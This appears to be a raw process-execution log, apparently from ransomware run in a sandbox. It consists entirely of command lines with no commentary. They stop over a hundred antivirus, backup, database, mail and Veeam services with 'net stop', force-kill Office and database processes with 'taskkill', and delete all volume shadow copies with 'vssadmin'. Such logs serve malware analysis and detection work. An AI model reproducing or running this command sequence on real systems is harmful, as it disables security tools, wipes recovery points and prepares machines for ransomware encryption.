C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "IISAdmin" /y

C:\Windows\SysWOW64\net.exe

net stop "IMAP4Svc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "IMAP4Svc" /y

C:\Windows\SysWOW64\net.exe

net stop "macmnsvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "macmnsvc" /y

C:\Windows\SysWOW64\net.exe

net stop "masvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "masvc" /y

C:\Windows\SysWOW64\net.exe

net stop "MBAMService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MBAMService" /y

C:\Windows\SysWOW64\net.exe

net stop "MBEndpointAgent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MBEndpointAgent" /y

C:\Windows\SysWOW64\net.exe

net stop "McAfeeEngineService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McAfeeEngineService" /y

C:\Windows\SysWOW64\net.exe

net stop "McAfeeFramework" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McAfeeFramework" /y

C:\Windows\SysWOW64\net.exe

net stop "McAfeeFrameworkMcAfeeFramework" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McAfeeFrameworkMcAfeeFramework" /y

C:\Windows\SysWOW64\net.exe

net stop "McShield" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McShield" /y

C:\Windows\SysWOW64\net.exe

net stop "McTaskManager" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McTaskManager" /y

C:\Windows\SysWOW64\net.exe

net stop "mfemms" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "mfemms" /y

C:\Windows\SysWOW64\net.exe

net stop "mfevtp" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "mfevtp" /y

C:\Windows\SysWOW64\net.exe

net stop "MMS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MMS" /y

C:\Windows\SysWOW64\net.exe

net stop "mozyprobackup" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "mozyprobackup" /y

C:\Windows\SysWOW64\net.exe

net stop "MsDtsServer" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MsDtsServer" /y

C:\Windows\SysWOW64\net.exe

net stop "MsDtsServer100" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MsDtsServer100" /y

C:\Windows\SysWOW64\net.exe

net stop "MsDtsServer110" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MsDtsServer110" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeES" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeES" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeIS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeIS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeMGMT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeMGMT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeMTA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeMTA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeSA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeSA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeSRS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeSRS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSOLAP$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSOLAP$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "MSOLAP$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSOLAP$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSOLAP$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSOLAP$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSOLAP$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSOLAP$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$BKUPEXEC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$BKUPEXEC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$ECWDB2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$ECWDB2" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$PRACTICEMGT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$PRACTICEMGT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$PRACTTICEBGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$PRACTTICEBGC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SBSMONITORING" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SBSMONITORING" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SHAREPOINT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SHAREPOINT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$VEEAMSQL2012" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2012" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$SBSMONITORING" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$SBSMONITORING" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$SHAREPOINT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$SHAREPOINT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLSERVER" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLSERVER" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLServerADHelper100" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLServerADHelper100" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLServerOLAPService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLServerOLAPService" /y

C:\Windows\SysWOW64\net.exe

net stop "MySQL80" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MySQL80" /y

C:\Windows\SysWOW64\net.exe

net stop "MySQL57" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MySQL57" /y

C:\Windows\SysWOW64\net.exe

net stop "ntrtscan" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ntrtscan" /y

C:\Windows\SysWOW64\net.exe

net stop "OracleClientCache80" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "OracleClientCache80" /y

C:\Windows\SysWOW64\net.exe

net stop "PDVFSService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "PDVFSService" /y

C:\Windows\SysWOW64\net.exe

net stop "POP3Svc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "POP3Svc" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "RESvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "RESvc" /y

C:\Windows\SysWOW64\net.exe

net stop "sacsvr" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "sacsvr" /y

C:\Windows\SysWOW64\net.exe

net stop "SamSs" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SysWOW64\net.exe

net stop "SAVAdminService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SAVAdminService" /y

C:\Windows\SysWOW64\net.exe

net stop "SAVService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SAVService" /y

C:\Windows\SysWOW64\net.exe

net stop "SDRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SysWOW64\net.exe

net stop "SepMasterService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SepMasterService" /y

C:\Windows\SysWOW64\net.exe

net stop "ShMonitor" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ShMonitor" /y

C:\Windows\SysWOW64\net.exe

net stop "Smcinst" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Smcinst" /y

C:\Windows\SysWOW64\net.exe

net stop "SmcService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SmcService" /y

C:\Windows\SysWOW64\net.exe

net stop "SMTPSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SMTPSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "SNAC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SNAC" /y

C:\Windows\SysWOW64\net.exe

net stop "SntpService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SntpService" /y

C:\Windows\SysWOW64\net.exe

net stop "sophossps" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "sophossps" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$BKUPEXEC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$BKUPEXEC" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$ECWDB2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$ECWDB2" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$PRACTTICEBGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEBGC" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$PRACTTICEMGT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEMGT" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SBSMONITORING" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SBSMONITORING" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SHAREPOINT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SHAREPOINT" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$VEEAMSQL2012" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2012" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLBrowser" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLBrowser" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLSafeOLRService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLSafeOLRService" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLSERVERAGENT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLSERVERAGENT" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLTELEMETRY" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLTELEMETRY" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLTELEMETRY$ECWDB2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLTELEMETRY$ECWDB2" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLWriter" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLWriter" /y

C:\Windows\SysWOW64\net.exe

net stop "SstpSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "svcGenericHost" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "svcGenericHost" /y

C:\Windows\SysWOW64\net.exe

net stop "swi_filter" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "swi_filter" /y

C:\Windows\SysWOW64\net.exe

net stop "swi_service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "swi_service" /y

C:\Windows\SysWOW64\net.exe

net stop "swi_update_64" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "swi_update_64" /y

C:\Windows\SysWOW64\net.exe

net stop "TmCCSF" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "TmCCSF" /y

C:\Windows\SysWOW64\net.exe

net stop "tmlisten" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "tmlisten" /y

C:\Windows\SysWOW64\net.exe

net stop "TrueKey" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "TrueKey" /y

C:\Windows\SysWOW64\net.exe

net stop "TrueKeyScheduler" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "TrueKeyScheduler" /y

C:\Windows\SysWOW64\net.exe

net stop "TrueKeyServiceHelper" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "TrueKeyServiceHelper" /y

C:\Windows\SysWOW64\net.exe

net stop "UI0Detect" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamBackupSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamBackupSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamBrokerSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamBrokerSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamCatalogSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamCatalogSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamCloudSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamCloudSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamDeploymentService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamDeploymentService" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamDeploySvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamDeploySvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamEnterpriseManagerSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamEnterpriseManagerSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamMountSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamMountSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamNFSSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamNFSSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamRESTSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamRESTSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamTransportSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamTransportSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "W3Svc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "W3Svc" /y

C:\Windows\SysWOW64\net.exe

net stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net stop "WRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "WRSVC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamHvIntegrationSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamHvIntegrationSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "swi_update" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "swi_update" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$CXDB" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$CXDB" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$CITRIX_METAFRAME" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$CITRIX_METAFRAME" /y

C:\Windows\SysWOW64\net.exe

net stop "SQL Backups" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQL Backups" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$PROD" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$PROD" /y

C:\Windows\SysWOW64\net.exe

net stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLServerADHelper" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLServerADHelper" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$PROD" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$PROD" /y

C:\Windows\SysWOW64\net.exe

net stop "msftesql$PROD" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "msftesql$PROD" /y

C:\Windows\SysWOW64\net.exe

net stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net.exe

net stop "EhttpSrv" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EhttpSrv" /y

C:\Windows\SysWOW64\net.exe

net stop "ekrn" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ekrn" /y

C:\Windows\SysWOW64\net.exe

net stop "ESHASRV" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ESHASRV" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SOPHOS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SOPHOS" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SOPHOS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SOPHOS" /y

C:\Windows\SysWOW64\net.exe

net stop "AVP" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "AVP" /y

C:\Windows\SysWOW64\net.exe

net stop "klnagent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "klnagent" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SQLEXPRESS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SQLEXPRESS" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SQLEXPRESS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SQLEXPRESS" /y

C:\Windows\SysWOW64\net.exe

net stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net stop "kavfsslp" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "kavfsslp" /y

C:\Windows\SysWOW64\net.exe

net stop "KAVFSGT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "KAVFSGT" /y

C:\Windows\SysWOW64\net.exe

net stop "KAVFS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "KAVFS" /y

C:\Windows\SysWOW64\net.exe

net stop "mfefire" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "mfefire" /y

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM zoolz.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM agntsvc.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM dbeng50.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM dbsnmp.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM encsvc.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM excel.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefoxconfig.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM infopath.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM isqlplussvc.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msaccess.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msftesql.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mspub.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mydesktopqos.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mydesktopservice.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mysqld.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mysqld-nt.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mysqld-opt.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM ocautoupds.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM ocomm.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM ocssd.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM onenote.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM oracle.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM outlook.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM powerpnt.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqbcoreservice.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlagent.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlbrowser.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlservr.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlwriter.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM steam.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM synctime.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM tbirdconfig.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM thebat.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM thebat64.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM thunderbird.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM visio.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM winword.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM wordpad.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM xfssvccon.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM tmlisten.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM PccNTMon.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM CNTAoSMgr.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM Ntrtscan.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mbamtray.exe /T

C:\Windows\SysWOW64\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=F: /on=F: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=F: /on=F: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

